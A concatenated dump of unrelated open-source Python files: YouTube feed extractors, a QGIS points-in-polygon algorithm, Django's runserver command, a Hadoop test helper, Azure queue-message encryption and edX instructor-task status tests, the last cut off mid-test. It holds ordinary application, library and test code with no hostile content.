class YoutubeFeedsInfoExtractor(YoutubeBaseInfoExtractor):
"""
Base class for feed extractors
Subclasses must define the _FEED_NAME and _PLAYLIST_TITLE properties.
"""
_LOGIN_REQUIRED = True
@property
def IE_NAME(self):
return 'youtube:%s' % self._FEED_NAME
def _real_initialize(self):
self._login()
def _entries(self, page):
# The extraction process is the same as for playlists, but the regex
# for the video ids doesn't contain an index
ids = []
more_widget_html = content_html = page
for page_num in itertools.count(1):
matches = re.findall(r'href="\s*/watch\?v=([0-9A-Za-z_-]{11})', content_html)
# 'recommended' feed has infinite 'load more' and each new portion spins
# the same videos in (sometimes) slightly different order, so we'll check
# for unicity and break when portion has no new videos
new_ids = list(filter(lambda video_id: video_id not in ids, orderedSet(matches)))
if not new_ids:
break
ids.extend(new_ids)
for entry in self._ids_to_results(new_ids):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), self._PLAYLIST_TITLE,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
more_widget_html = more['load_more_widget_html']
def _real_extract(self, url):
page = self._download_webpage(
'https://www.youtube.com/feed/%s' % self._FEED_NAME,
self._PLAYLIST_TITLE)
return self.playlist_result(
self._entries(page), playlist_title=self._PLAYLIST_TITLE)
class YoutubeWatchLaterIE(YoutubePlaylistIE):
IE_NAME = 'youtube:watchlater'
IE_DESC = 'Youtube watch later list, ":ytwatchlater" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/(?:feed/watch_later|(?:playlist|watch)\?(?:.+&)?list=WL)|:ytwatchlater'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=WL',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?v=bCNU9TrbiRk&index=1&list=WL',
'only_matching': True,
}]
def _real_extract(self, url):
_, video = self._check_download_just_video(url, 'WL')
if video:
return video
_, playlist = self._extract_playlist('WL')
return playlist
class YoutubeFavouritesIE(YoutubeBaseInfoExtractor):
IE_NAME = 'youtube:favorites'
IE_DESC = 'YouTube.com favourite videos, ":ytfav" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/my_favorites|:ytfav(?:ou?rites)?'
_LOGIN_REQUIRED = True
def _real_extract(self, url):
webpage = self._download_webpage('https://www.youtube.com/my_favorites', 'Youtube Favourites videos')
playlist_id = self._search_regex(r'list=(.+?)["&]', webpage, 'favourites playlist id')
return self.url_result(playlist_id, 'YoutubePlaylist')
class YoutubeRecommendedIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com recommended videos, ":ytrec" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/recommended|:ytrec(?:ommended)?'
_FEED_NAME = 'recommended'
_PLAYLIST_TITLE = 'Youtube Recommended videos'
class YoutubeSubscriptionsIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com subscriptions feed, "ytsubs" keyword (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/subscriptions|:ytsubs(?:criptions)?'
_FEED_NAME = 'subscriptions'
_PLAYLIST_TITLE = 'Youtube Subscriptions'
class YoutubeHistoryIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'Youtube watch history, ":ythistory" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/history|:ythistory'
_FEED_NAME = 'history'
_PLAYLIST_TITLE = 'Youtube History'
class YoutubeTruncatedURLIE(InfoExtractor):
IE_NAME = 'youtube:truncated_url'
IE_DESC = False # Do not list
_VALID_URL = r'''(?x)
(?:https?://)?
(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/
(?:watch\?(?:
feature=[a-z_]+|
annotation_id=annotation_[^&]+|
x-yt-cl=[0-9]+|
hl=[^&]*|
t=[0-9]+
)?
|
attribution_link\?a=[^&]+
)
$
'''
_TESTS = [{
'url': 'https://www.youtube.com/watch?annotation_id=annotation_3951667041',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?x-yt-cl=84503534',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?feature=foo',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?hl=en-GB',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?t=2372',
'only_matching': True,
}]
def _real_extract(self, url):
raise ExtractorError(
'Did you forget to quote the URL? Remember that & is a meta '
'character in most shells, so you want to put the URL in quotes, '
'like youtube-dl '
'"https://www.youtube.com/watch?feature=foo&v=BaW_jenozKc" '
' or simply youtube-dl BaW_jenozKc .',
expected=True)
class YoutubeTruncatedIDIE(InfoExtractor):
IE_NAME = 'youtube:truncated_id'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/watch\?v=(?P<id>[0-9A-Za-z_-]{1,10})$'
_TESTS = [{
'url': 'https://www.youtube.com/watch?v=N_708QY7Ob',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
raise ExtractorError(
'Incomplete YouTube ID %s. URL %s looks truncated.' % (video_id, url),
expected=True)
| gpl-3.0 |
michaelkirk/QGIS | python/plugins/processing/algs/qgis/PointsInPolygonWeighted.py | 1 | 5085 | # -*- coding: utf-8 -*-
"""
***************************************************************************
PointsInPolygon.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QgsField, QgsFeatureRequest, QgsFeature, QgsGeometry
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterString
from processing.core.parameters import ParameterTableField
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
class PointsInPolygonWeighted(GeoAlgorithm):
POLYGONS = 'POLYGONS'
POINTS = 'POINTS'
OUTPUT = 'OUTPUT'
FIELD = 'FIELD'
WEIGHT = 'WEIGHT'
# =========================================================================
# def getIcon(self):
# return QIcon(os.path.dirname(__file__) + "/icons/sum_points.png")
# =========================================================================
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Count points in polygon(weighted)')
self.group, self.i18n_group = self.trAlgorithm('Vector analysis tools')
self.addParameter(ParameterVector(self.POLYGONS,
self.tr('Polygons'), [ParameterVector.VECTOR_TYPE_POLYGON]))
self.addParameter(ParameterVector(self.POINTS,
self.tr('Points'), [ParameterVector.VECTOR_TYPE_POINT]))
self.addParameter(ParameterTableField(self.WEIGHT,
self.tr('Weight field'), self.POINTS))
self.addParameter(ParameterString(self.FIELD,
self.tr('Count field name'), 'NUMPOINTS'))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Weighted count')))
def processAlgorithm(self, progress):
polyLayer = dataobjects.getObjectFromUri(self.getParameterValue(self.POLYGONS))
pointLayer = dataobjects.getObjectFromUri(self.getParameterValue(self.POINTS))
fieldName = self.getParameterValue(self.FIELD)
fieldIdx = pointLayer.fieldNameIndex(self.getParameterValue(self.WEIGHT))
polyProvider = polyLayer.dataProvider()
fields = polyProvider.fields()
fields.append(QgsField(fieldName, QVariant.Int))
(idxCount, fieldList) = vector.findOrCreateField(polyLayer,
polyLayer.pendingFields(), fieldName)
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(
fields.toList(), polyProvider.geometryType(), polyProvider.crs())
spatialIndex = vector.spatialindex(pointLayer)
ftPoint = QgsFeature()
outFeat = QgsFeature()
geom = QgsGeometry()
current = 0
hasIntersections = False
features = vector.features(polyLayer)
total = 100.0 / float(len(features))
for ftPoly in features:
geom = ftPoly.geometry()
attrs = ftPoly.attributes()
count = 0
hasIntersections = False
points = spatialIndex.intersects(geom.boundingBox())
if len(points) > 0:
hasIntersections = True
if hasIntersections:
progress.setText(str(len(points)))
for i in points:
request = QgsFeatureRequest().setFilterFid(i)
ftPoint = pointLayer.getFeatures(request).next()
tmpGeom = QgsGeometry(ftPoint.geometry())
if geom.contains(tmpGeom):
weight = str(ftPoint.attributes()[fieldIdx])
try:
count += float(weight)
except:
# Ignore fields with non-numeric values
pass
outFeat.setGeometry(geom)
if idxCount == len(attrs):
attrs.append(count)
else:
attrs[idxCount] = count
outFeat.setAttributes(attrs)
writer.addFeature(outFeat)
current += 1
progress.setPercentage(int(current * total))
del writer
| gpl-2.0 |
xrg/django-static-gitified | django/core/management/commands/runserver.py | 77 | 5859 | from optparse import make_option
import os
import re
import sys
import socket
from django.core.management.base import BaseCommand, CommandError
from django.core.servers.basehttp import AdminMediaHandler, run, WSGIServerException, get_internal_wsgi_application
from django.utils import autoreload
naiveip_re = re.compile(r"""^(?:
(?P<addr>
(?P<ipv4>\d{1,3}(?:\.\d{1,3}){3}) | # IPv4 address
(?P<ipv6>\[[a-fA-F0-9:]+\]) | # IPv6 address
(?P<fqdn>[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*) # FQDN
):)?(?P<port>\d+)$""", re.X)
DEFAULT_PORT = "8000"
class BaseRunserverCommand(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--ipv6', '-6', action='store_true', dest='use_ipv6', default=False,
help='Tells Django to use a IPv6 address.'),
make_option('--nothreading', action='store_false', dest='use_threading', default=True,
help='Tells Django to NOT use threading.'),
make_option('--noreload', action='store_false', dest='use_reloader', default=True,
help='Tells Django to NOT use the auto-reloader.'),
)
help = "Starts a lightweight Web server for development."
args = '[optional port number, or ipaddr:port]'
# Validation is called explicitly each time the server is reloaded.
requires_model_validation = False
def get_handler(self, *args, **options):
"""
Returns the default WSGI handler for the runner.
"""
return get_internal_wsgi_application()
def handle(self, addrport='', *args, **options):
self.use_ipv6 = options.get('use_ipv6')
if self.use_ipv6 and not socket.has_ipv6:
raise CommandError('Your Python does not support IPv6.')
if args:
raise CommandError('Usage is runserver %s' % self.args)
self._raw_ipv6 = False
if not addrport:
self.addr = ''
self.port = DEFAULT_PORT
else:
m = re.match(naiveip_re, addrport)
if m is None:
raise CommandError('"%s" is not a valid port number '
'or address:port pair.' % addrport)
self.addr, _ipv4, _ipv6, _fqdn, self.port = m.groups()
if not self.port.isdigit():
raise CommandError("%r is not a valid port number." % self.port)
if self.addr:
if _ipv6:
self.addr = self.addr[1:-1]
self.use_ipv6 = True
self._raw_ipv6 = True
elif self.use_ipv6 and not _fqdn:
raise CommandError('"%s" is not a valid IPv6 address.' % self.addr)
if not self.addr:
self.addr = self.use_ipv6 and '::1' or '127.0.0.1'
self._raw_ipv6 = bool(self.use_ipv6)
self.run(*args, **options)
def run(self, *args, **options):
"""
Runs the server, using the autoreloader if needed
"""
use_reloader = options.get('use_reloader')
if use_reloader:
autoreload.main(self.inner_run, args, options)
else:
self.inner_run(*args, **options)
def inner_run(self, *args, **options):
from django.conf import settings
from django.utils import translation
threading = options.get('use_threading')
shutdown_message = options.get('shutdown_message', '')
quit_command = (sys.platform == 'win32') and 'CTRL-BREAK' or 'CONTROL-C'
self.stdout.write("Validating models...\n\n")
self.validate(display_num_errors=True)
self.stdout.write((
"Django version %(version)s, using settings %(settings)r\n"
"Development server is running at http://%(addr)s:%(port)s/\n"
"Quit the server with %(quit_command)s.\n"
) % {
"version": self.get_version(),
"settings": settings.SETTINGS_MODULE,
"addr": self._raw_ipv6 and '[%s]' % self.addr or self.addr,
"port": self.port,
"quit_command": quit_command,
})
# django.core.management.base forces the locale to en-us. We should
# set it up correctly for the first request (particularly important
# in the "--noreload" case).
translation.activate(settings.LANGUAGE_CODE)
try:
handler = self.get_handler(*args, **options)
run(self.addr, int(self.port), handler,
ipv6=self.use_ipv6, threading=threading)
except WSGIServerException, e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
13: "You don't have permission to access that port.",
98: "That port is already in use.",
99: "That IP address can't be assigned-to.",
}
try:
error_text = ERRORS[e.args[0].args[0]]
except (AttributeError, KeyError):
error_text = str(e)
sys.stderr.write(self.style.ERROR("Error: %s" % error_text) + '\n')
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
self.stdout.write("%s\n" % shutdown_message)
sys.exit(0)
class Command(BaseRunserverCommand):
option_list = BaseRunserverCommand.option_list + (
make_option('--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.'),
)
def get_handler(self, *args, **options):
"""
Serves admin media like old-school (deprecation pending).
"""
handler = super(Command, self).get_handler(*args, **options)
return AdminMediaHandler(handler, options.get('admin_media_path'))
| bsd-3-clause |
dongpf/hadoop-0.19.1 | src/contrib/hod/testing/helper.py | 182 | 1122 | #Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import sys
sampleText = "Hello World!"
if __name__=="__main__":
args = sys.argv[1:]
if args[0] == "1":
# print sample text to stderr
sys.stdout.write(sampleText)
elif args[0] == "2":
# print sample text to stderr
sys.stderr.write(sampleText)
# Add any other helper programs here, with different values for args[0]
pass
| apache-2.0 |
dstrockis/outlook-autocategories | lib/azure/storage/queue/_encryption.py | 1 | 7544 | #-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from azure.common import (
AzureException,
)
from .._constants import (
_ENCRYPTION_PROTOCOL_V1,
)
from .._encryption import (
_generate_encryption_data_dict,
_dict_to_encryption_data,
_generate_AES_CBC_cipher,
_validate_and_unwrap_cek,
_EncryptionAlgorithm,
)
from json import (
dumps,
loads,
)
from base64 import(
b64encode,
b64decode,
)
from .._error import(
_ERROR_UNSUPPORTED_ENCRYPTION_VERSION,
_ERROR_DECRYPTION_FAILURE,
_ERROR_DATA_NOT_ENCRYPTED,
_ERROR_UNSUPPORTED_ENCRYPTION_ALGORITHM,
_validate_not_none,
_validate_key_encryption_key_wrap,
_validate_key_encryption_key_unwrap,
_validate_encryption_protocol_version,
_validate_kek_id,
)
from .._common_conversion import (
_encode_base64,
_decode_base64_to_bytes
)
from cryptography.hazmat.primitives.padding import PKCS7
import os
def _encrypt_queue_message(message, key_encryption_key):
'''
Encrypts the given plain text message using AES256 in CBC mode with 128 bit padding.
Wraps the generated content-encryption-key using the user-provided key-encryption-key (kek).
Returns a json-formatted string containing the encrypted message and the encryption metadata.
:param object message:
The plain text messge to be encrypted.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
wrap_key(key)--wraps the specified key using an algorithm of the user's choice.
get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key.
get_kid()--returns a string key id for this key-encryption-key.
:return: A json-formatted string containing the encrypted message and the encryption metadata.
:rtype: str
'''
_validate_not_none('message', message)
_validate_not_none('key_encryption_key', key_encryption_key)
_validate_key_encryption_key_wrap(key_encryption_key)
# AES256 uses 256 bit (32 byte) keys and always with 16 byte blocks
content_encryption_key = os.urandom(32)
initialization_vector = os.urandom(16)
# Queue encoding functions all return unicode strings, and encryption should
# operate on binary strings.
message = message.encode('utf-8')
cipher = _generate_AES_CBC_cipher(content_encryption_key, initialization_vector)
# PKCS7 with 16 byte blocks ensures compatibility with AES.
padder = PKCS7(128).padder()
padded_data = padder.update(message) + padder.finalize()
# Encrypt the data.
encryptor = cipher.encryptor()
encrypted_data = encryptor.update(padded_data) + encryptor.finalize()
# Build the dictionary structure.
queue_message = {}
queue_message['EncryptedMessageContents'] = _encode_base64(encrypted_data)
queue_message['EncryptionData'] = _generate_encryption_data_dict(key_encryption_key,
content_encryption_key,
initialization_vector)
return dumps(queue_message)
def _decrypt_queue_message(message, require_encryption, key_encryption_key, resolver):
'''
Returns the decrypted message contents from an EncryptedQueueMessage.
If no encryption metadata is present, will return the unaltered message.
:param str message:
The JSON formatted QueueEncryptedMessage contents with all associated metadata.
:param bool require_encryption:
If set, will enforce that the retrieved messages are encrypted and decrypt them.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
unwrap_key(key, algorithm)--returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
get_kid()--returns a string key id for this key-encryption-key.
:param function resolver(kid):
The user-provided key resolver. Uses the kid string to return a key-encryption-key implementing the interface defined above.
:return: The plain text message from the queue message.
:rtype: str
'''
try:
message = loads(message)
encryption_data = _dict_to_encryption_data(message['EncryptionData'])
decoded_data = _decode_base64_to_bytes(message['EncryptedMessageContents'])
except (KeyError, ValueError) as e:
# Message was not json formatted and so was not encrypted
# or the user provided a json formatted message.
if require_encryption:
raise ValueError(_ERROR_MESSAGE_NOT_ENCRYPTED)
else:
return message
try:
return _decrypt(decoded_data, encryption_data, key_encryption_key, resolver).decode('utf-8')
except Exception as e:
raise AzureException(_ERROR_DECRYPTION_FAILURE)
def _decrypt(message, encryption_data, key_encryption_key=None, resolver=None):
'''
Decrypts the given ciphertext using AES256 in CBC mode with 128 bit padding.
Unwraps the content-encryption-key using the user-provided or resolved key-encryption-key (kek). Returns the original plaintex.
:param str message:
The ciphertext to be decrypted.
:param _EncryptionData encryption_data:
The metadata associated with this ciphertext.
:param object key_encryption_key:
The user-provided key-encryption-key. Must implement the following methods:
unwrap_key(key, algorithm)--returns the unwrapped form of the specified symmetric key using the string-specified algorithm.
get_kid()--returns a string key id for this key-encryption-key.
:param function resolver(kid):
The user-provided key resolver. Uses the kid string to return a key-encryption-key implementing the interface defined above.
:return: The decrypted plaintext.
:rtype: str
'''
_validate_not_none('message', message)
content_encryption_key = _validate_and_unwrap_cek(encryption_data, key_encryption_key, resolver)
if not ( _EncryptionAlgorithm.AES_CBC_256 == encryption_data.encryption_agent.encryption_algorithm):
raise ValueError(_ERROR_UNSUPPORTED_ENCRYPTION_ALGORITHM)
cipher = _generate_AES_CBC_cipher(content_encryption_key, encryption_data.content_encryption_IV)
#decrypt data
decrypted_data = message
decryptor = cipher.decryptor()
decrypted_data = (decryptor.update(decrypted_data) + decryptor.finalize())
#unpad data
unpadder = PKCS7(128).unpadder()
decrypted_data = (unpadder.update(decrypted_data) + unpadder.finalize())
return decrypted_data | apache-2.0 |
olexiim/edx-platform | lms/djangoapps/instructor_task/tests/test_views.py | 204 | 17817 |
"""
Test for LMS instructor background task views.
"""
import json
from celery.states import SUCCESS, FAILURE, REVOKED, PENDING
from mock import Mock, patch
from django.utils.datastructures import MultiValueDict
from instructor_task.models import PROGRESS
from instructor_task.tests.test_base import (InstructorTaskTestCase,
TEST_FAILURE_MESSAGE,
TEST_FAILURE_EXCEPTION)
from instructor_task.views import instructor_task_status, get_task_completion_info
class InstructorTaskReportTest(InstructorTaskTestCase):
"""
Tests view methods that involve the reporting of status for background tasks.
"""
def _get_instructor_task_status(self, task_id):
"""Returns status corresponding to task_id via api method."""
request = Mock()
request.REQUEST = {'task_id': task_id}
return instructor_task_status(request)
def test_instructor_task_status(self):
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
def test_missing_instructor_task_status(self):
task_id = "missing_id"
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output, {})
def test_instructor_task_status_list(self):
# Fetch status for existing tasks by arg list, as if called from ajax.
# Note that ajax does something funny with the marshalling of
# list data, so the key value has "[]" appended to it.
task_ids = [(self._create_failure_entry()).task_id for _ in range(1, 5)]
request = Mock()
request.REQUEST = MultiValueDict({'task_ids[]': task_ids})
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(len(output), len(task_ids))
for task_id in task_ids:
self.assertEquals(output[task_id]['task_id'], task_id)
def test_get_status_from_failure(self):
# get status for a task that has already failed
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], TEST_FAILURE_MESSAGE)
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': TEST_FAILURE_EXCEPTION,
'message': TEST_FAILURE_MESSAGE,
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_success(self):
# get status for a task that has already succeeded
instructor_task = self._create_success_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'total': 5,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_legacy_success(self):
# get status for a task that had already succeeded, back at a time
# when 'updated' was used instead of the preferred 'succeeded'.
legacy_progress = {
'attempted': 3,
'updated': 2,
'total': 5,
'action_name': 'rescored',
}
instructor_task = self._create_entry(task_state=SUCCESS, task_output=legacy_progress)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
self.assertEquals(output['task_progress'], legacy_progress)
def _create_email_subtask_entry(self, total=5, attempted=3, succeeded=2, skipped=0, task_state=PROGRESS):
"""Create an InstructorTask with subtask defined and email argument."""
progress = {'attempted': attempted,
'succeeded': succeeded,
'skipped': skipped,
'total': total,
'action_name': 'emailed',
}
instructor_task = self._create_entry(task_state=task_state, task_output=progress)
instructor_task.subtasks = {}
instructor_task.task_input = json.dumps({'email_id': 134})
instructor_task.save()
return instructor_task
def test_get_status_from_subtasks(self):
# get status for a task that is in progress, with updates
# from subtasks.
instructor_task = self._create_email_subtask_entry(skipped=1)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Progress: emailed 2 of 3 so far (skipping 1) (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'skipped': 1,
'total': 5,
'action_name': 'emailed',
}
self.assertEquals(output['task_progress'], expected_progress)
def _test_get_status_from_result(self, task_id, mock_result=None):
"""
Provides mock result to caller of instructor_task_status, and returns resulting output.
"""
with patch('celery.result.AsyncResult.__new__') as mock_result_ctor:
mock_result_ctor.return_value = mock_result
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
return output
def test_get_status_to_pending(self):
# get status for a task that hasn't begun to run yet
instructor_task = self._create_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PENDING
output = self._test_get_status_from_result(task_id, mock_result)
for key in ['message', 'succeeded', 'task_progress']:
self.assertTrue(key not in output)
self.assertEquals(output['task_state'], 'PENDING')
self.assertTrue(output['in_progress'])
def test_update_progress_to_progress(self):
# view task entry for task in progress
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PROGRESS
mock_result.result = {
'attempted': 5,
'succeeded': 4,
'total': 10,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Progress: rescored 4 of 5 so far (out of 10)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
self.assertEquals(output['task_progress'], mock_result.result)
def test_update_progress_to_failure(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = FAILURE
mock_result.result = NotImplementedError("This task later failed.")
mock_result.traceback = "random traceback"
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "This task later failed.")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': 'NotImplementedError',
'message': "This task later failed.",
'traceback': "random traceback",
}
self.assertEquals(output['task_progress'], expected_progress)
def test_update_progress_to_revoked(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = REVOKED
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Task revoked before running")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], REVOKED)
self.assertFalse(output['in_progress'])
expected_progress = {'message': "Task revoked before running"}
self.assertEquals(output['task_progress'], expected_progress)
def _get_output_for_task_success(self, attempted, succeeded, total, student=None):
"""returns the task_id and the result returned by instructor_task_status()."""
# view task entry for task in progress
instructor_task = self._create_progress_entry(student)
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = SUCCESS
mock_result.result = {
'attempted': attempted,
'succeeded': succeeded,
'total': total,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
return output
def _get_email_output_for_task_success(self, attempted, succeeded, total, skipped=0):
"""returns the result returned by instructor_task_status()."""
instructor_task = self._create_email_subtask_entry(
total=total,
attempted=attempted,
succeeded=succeeded,
skipped=skipped,
task_state=SUCCESS,
)
return self._test_get_status_from_result(instructor_task.task_id)
def test_update_progress_to_success(self):
output = self._get_output_for_task_success(10, 8, 10)
self.assertEquals(output['message'], "Problem rescored for 8 of 10 students")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 10,
'succeeded': 8,
'total': 10,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_success_messages(self):
output = self._get_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any students with submissions to be rescored (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Problem failed to be rescored for any of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 9 students (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Problem successfully rescored for 10 students")
self.assertTrue(output['succeeded'])
output = self._get_output_for_task_success(0, 0, 1, student=self.student)
self.assertTrue("Unable to find submission to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 0, 1, student=self.student)
self.assertTrue("Problem failed to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 1, 1, student=self.student)
self.assertTrue("Problem successfully rescored for student" in output['message'])
self.assertTrue(output['succeeded'])
def test_email_success_messages(self):
output = self._get_email_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients ")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients")
self.assertTrue(output['succeeded'])
output = self._get_email_output_for_task_success(0, 0, 10, skipped=3)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10, skipped=3)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10, skipped=3)
